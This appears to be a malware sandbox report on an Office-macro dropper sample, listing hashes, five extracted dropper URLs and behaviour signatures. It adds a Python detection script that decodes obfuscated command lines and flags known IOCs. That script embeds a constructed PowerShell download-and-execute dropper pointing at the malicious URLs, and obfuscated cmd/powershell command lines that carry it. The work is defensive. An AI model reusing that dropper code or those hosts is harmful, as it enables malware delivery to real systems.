General

  • Target

    649a322463ae3003e2b0c8f02ade3262_JaffaCakes118

  • Size

    78KB

  • Sample

    240521-yxbzdsgh88

  • MD5

    649a322463ae3003e2b0c8f02ade3262

  • SHA1

    9139602374f2500f3156b8b76be211c414d29c77

  • SHA256

    4d9a774a08bfe1c47c9075cc3bb351ec9dfeaa453118d4ae6d928812ccc91f76

  • SHA512

    8376e2f12e40550bb10a789c10682566c7a30bf7e9d1adf178afaf8832d8bf89be6565a15be009408206fed8ff53321d20a092d9c15b46dcb510e8990fd14bde

  • SSDEEP

    1536:JptJlmrJpmxlRw99NBO+aAIIrlnKchqXN076KC0It4oC:3te2dw99fK2vR1It4

Score
10/10

Malware Config

Extracted

  • Language

    ps1

  • Deobfuscated

  • URLs (type: exe.dropper)

    http://aliu-rdc.org/QwWKYJxM
    http://2idiotsandnobusinessplan.com/wC7
    http://7naturalessences.com/DFaSvtrS
    http://benimdunyamkres.com/v0vig1G1
    http://hostmktar.com/mP

Targets

    • Target

      649a322463ae3003e2b0c8f02ade3262_JaffaCakes118 (78KB; MD5, SHA1, SHA256, SHA512 and SSDEEP as listed under General above)

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • An obfuscated cmd.exe command-line is typically used to evade detection.
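Added example, not part of the sandbox report or the sample: a Python script that applies the three signatures listed above (an Office parent spawning a script host, an obfuscated or base64-encoded command line, and a download from a blocklisted address) to constructed Sysmon-style process-creation events. It strips cmd.exe caret escapes, decodes a PowerShell -EncodedCommand payload (base64 of UTF-16LE text) and compares the URLs found in the decoded script against the five exe.dropper URLs from the extracted config. The dropper script body, the process names and the event records are constructed for illustration; the sample's real deobfuscated code is not reproduced on this page.

```python
import base64
import re

# The five exe.dropper URLs from the extracted config above, used as an IOC list.
DROPPER_URLS = [
    "http://aliu-rdc.org/QwWKYJxM",
    "http://2idiotsandnobusinessplan.com/wC7",
    "http://7naturalessences.com/DFaSvtrS",
    "http://benimdunyamkres.com/v0vig1G1",
    "http://hostmktar.com/mP",
]

# Constructed stand-in for the dropper (NOT the sample's real script): walk the URL
# list, save the first download that succeeds to %TEMP% and execute it.
CONSTRUCTED_SCRIPT = (
    "$u='" + ",".join(DROPPER_URLS) + "'.Split(',');"
    "$p=$env:temp+'\\'+(Get-Random)+'.exe';"
    "foreach($x in $u){try{(New-Object Net.WebClient).DownloadFile($x,$p);"
    "Invoke-Item $p;break}catch{}}"
)
# PowerShell's -EncodedCommand expects base64 of the UTF-16LE script text.
ENCODED = base64.b64encode(CONSTRUCTED_SCRIPT.encode("utf-16-le")).decode("ascii")

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Matches -e, -ec, -enc and -encodedcommand (PowerShell accepts any unambiguous prefix).
ENC_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
URL_RE = re.compile(r"https?://[^\s'\"`,;)]+")


def decode_encoded_command(cmdline):
    """Strip cmd.exe caret escapes, then decode an -EncodedCommand payload if present."""
    m = ENC_RE.search(cmdline.replace("^", ""))
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event):
    """Apply the three signature-style checks to one process-creation event."""
    parent = event["parent_image"].lower()
    image = event["image"].lower()
    cmdline = event["cmdline"]
    reasons, urls = [], []

    # Signature 1: unexpected child (macro or exploit driving an Office process).
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        reasons.append("office_parent_spawned_script_host")

    # Signature 3: obfuscated command line (caret escaping or an encoded payload).
    decoded = decode_encoded_command(cmdline)
    if cmdline.count("^") >= 3 or decoded is not None:
        reasons.append("obfuscated_cmdline")

    # Signature 2: the decoded script reaches out to a known dropper URL.
    if decoded:
        urls = URL_RE.findall(decoded)
        if any(u in DROPPER_URLS for u in urls):
            reasons.append("known_dropper_url")

    return {"reasons": reasons, "urls": urls, "decoded": decoded}


def analyze(events):
    """Return {event id: findings} for a list of constructed events."""
    return {e["id"]: analyze_event(e) for e in events}


# Constructed process-creation events (Sysmon Event ID 1 style); image names are basenames.
SAMPLE_EVENTS = [
    {"id": 1, "parent_image": "explorer.exe", "image": "WINWORD.EXE",
     "cmdline": '"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE" /n invoice.doc'},
    {"id": 2, "parent_image": "WINWORD.EXE", "image": "cmd.exe",
     "cmdline": "cmd /c p^o^w^e^r^s^h^e^l^l -NoP -W Hidden -E^n^c " + ENCODED},
    {"id": 3, "parent_image": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell -NoP -W Hidden -Enc " + ENCODED},
    {"id": 4, "parent_image": "svchost.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Date"},
]

if __name__ == "__main__":
    for eid, result in analyze(SAMPLE_EVENTS).items():
        print(eid, result["reasons"], result["urls"])
```

Events 2 and 3 trip all the checks that apply to them while the benign WINWORD and svchost events produce no findings. Real Sysmon records carry full image paths, so basename them before the set lookups, and note that this only peels caret escaping and -EncodedCommand; droppers that build strings with concatenation, the -f format operator or nested Invoke-Expression need additional decoding passes before the URL regex will see anything.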

MITRE ATT&CK Enterprise v15